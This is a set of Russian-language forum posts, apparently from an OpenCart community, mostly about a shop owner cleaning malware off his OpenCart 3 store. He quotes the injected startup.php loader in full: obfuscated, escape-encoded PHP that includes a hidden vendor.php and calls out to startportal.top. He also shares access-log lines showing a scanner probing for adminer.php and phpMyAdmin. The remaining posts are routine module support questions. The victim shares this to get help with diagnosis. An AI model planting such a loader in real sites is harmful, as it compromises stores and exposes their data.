maaby

Спасибо за предложение, я пока сам. Если закончатся идеи, тогда буду искать специалиста.

В этот раз не спешил и сделал скриншот изменений, которые сделал вирус.

Скорее всего так и было. Т.к. не смог зайти в админку под своим логином \ паролем, но не придал этому значения, просто сбросил через БД. А в "Расширения" -> "установка расширений" - истории установок был пару месяцев назад загружен модуль english-clear-install_OC23 Т.к. я не помню, чтобы что-то такое устанавливал, то просто удалил его. Может поможет, т.к. вредоносные сайты опять появились на моем хостинге. Очередной этап битвы, мне уже даже интересно)

Добрый день. Да. Спасибо, что указали мне на этот модуль. Не помню даже, зачем его ставил. Вы вырвали из контекста мою фразу. Самый лучший в РБ. Я понимаю, почему вы это пишите... Но я уже давно не живу в Беларуси, т.к. не согласен с тем, что происходит. Правда магазин еще там остался, работает, что-то зарабатывает и помогает оплачивать тут счета. Отказываться от того, что приносит хоть какой-то доп. доход, я не хочу, поймите меня правильно. Огромное спасибо за дельный совет! Надо было давно проверить логи, только я с перепуга всё стер, как только увидел Скорее всего ваш коллега выше уже нашел то, что я должен был обнаружить в логах. В общем, файл adminer.php лежит уже на сервере с 20го года. Но попытка загрузки сторонних файлов на сайт была только пару недель назад... Вот интересное еще в логах нашел. Стучались по следующим адресам: 109.196.163.71 - - [02/Jul/2024:09:47:21 +0300] "GET /composer.json HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:23 +0300] "GET /package.json HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:25 +0300] "GET /adminer.php HTTP/1.0" 200 4049 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:26 +0300] "GET /phpmyadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:29 +0300] "GET /phpMyAdmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:30 +0300] "GET /pma HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:32 +0300] "GET /myadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:34 +0300] "GET /dbadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 109.196.163.71 - - [02/Jul/2024:09:47:37 +0300] "GET /_phpmyadmin HTTP/1.0" 404 42489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" admirer.php как вы понимаете, был... Буду обновлять по мере появления новой инфы. Всем еще раз спасибо за наводки и советы.

Не должен, по крайней мере я надеюсь на это. Убрал старые модули, которые уже давно не используются, обновил остальные, сменил пароли на хостинг, обновил версию php, подключил антивирус. Не смотря на язвительные комментарии, я буду информировать участников форума, т.к. тема возможно будет для кого-то полезна. Если не отпишусь, то всё ок.

Спасибо за предложение, я то вычистил уже всё. Просто интересно, как такие вирусы попадают.

Хостинг в беларуси. Hoster.by, самый лучший, что у нас есть. 99% куплено на этом сайте. Может пару штук купил на opencart.com. Никаких помоек я точно не посещал и ничего из них не качал.

Добрый день сообщество. Столкнулся с такой проблемой. opencart 3, внесены изменения в файл startup.php Выглядит это так: <?php $d9 = $_SERVER["\104\x4f\103\125\115\x45\116\x54\x5f\x52\x4f\117\x54"] . "\x2f\143\x61\x74\x61\x6c\x6f\147\57\x6d\x6f\144\x65\154\57\x61\143\143\x6f\x75\156\164\57"; require_once $d9 . "\166\x65\156\x64\157\x72\x2e\160\150\x70"; nMrChmuwkz::COweBqRSju("\x68\164\164\x70\x73\x3a\x2f\57\x73\164\x61\162\164\x70\x6f\x72\x74\x61\154\56\x74\157\160\57\151\156\x66\x6f\x2f", "\62\71\61\x36", 1, 1); ?> Если кратко - подключается файл vendor.php и запускается метод nMrChmuwkz::COweBqRSju("https://startportal.top/info/", "2916", 1, 1); который скорее всего отправляет данные на https://startportal.top/info/ Прикрепил файл вендор пхп, для примера, он зашифрован с использованием escape-последовательностей. он дальше много чего подгружает. Потом создают форму, через которую на мой сервер загружают файл с именем mysql_pdo.php Что я пока не понял: какие данные они выгружают из БД. А главное, каким образом эта хрень попала на мой сайт. Предвосхищая комментарии, сразу напишу - никаких модулей я не скачивал с варез сайтов. Все купленно. Но правда в том, что некоторые давно не обновлялись. Подскажите, может кто сталкивался с похожим? Куда копать и как искать, кто виновник... Файлы вируса приложил, но не все, т.к. первой реакцией было вычистить его нафиг. Только потом начал что-то сохранять себе для анализа. vendor.php startup.php plugins.php dist.php english.php

Добрый день. Не подскажете, как можно сделать, чтобы в каталоге и на стр. товара звездочки аналогично, закрашивались частично, как в самом модуле. Сейчас звездочка либо целиком закрашена, либо нет. В самом модуле - работает все хорошо.

@Kostya150 Спасибо за решение. Все отлично работает.

Спасибо, все так и есть. Исправил. Моя ошибка в том, что я думал - это фильтр только для исключений, а если его не настраивать то автоматически подтягивается все.

Добрый день. Обновил модуль. Создал виджет, но при нажатии на обновление кэша выдает окошко с ошибкой:

Добрый день. Подскажите, планируется ли интеграция пользователей сайта с физ. лицами из 1с. К примеру у нас бонусная программа и люди регистрируются в магазине, получают бонусные баллы за покупку. Было бы интересно, синхронизировать клиентов (по уникальному полю - может номер телефона, а затем фамилии) между 1с и сайтом, а так-же их бонусные баллы (чтобы их можно было потратить в интернет магазине). Или может можно допилить индивидуально (вопрос цены).

@markimax Добрый день, писал в личку по поводу обновления и настройки модуля, как увидите - отпишитесь пожалуйста.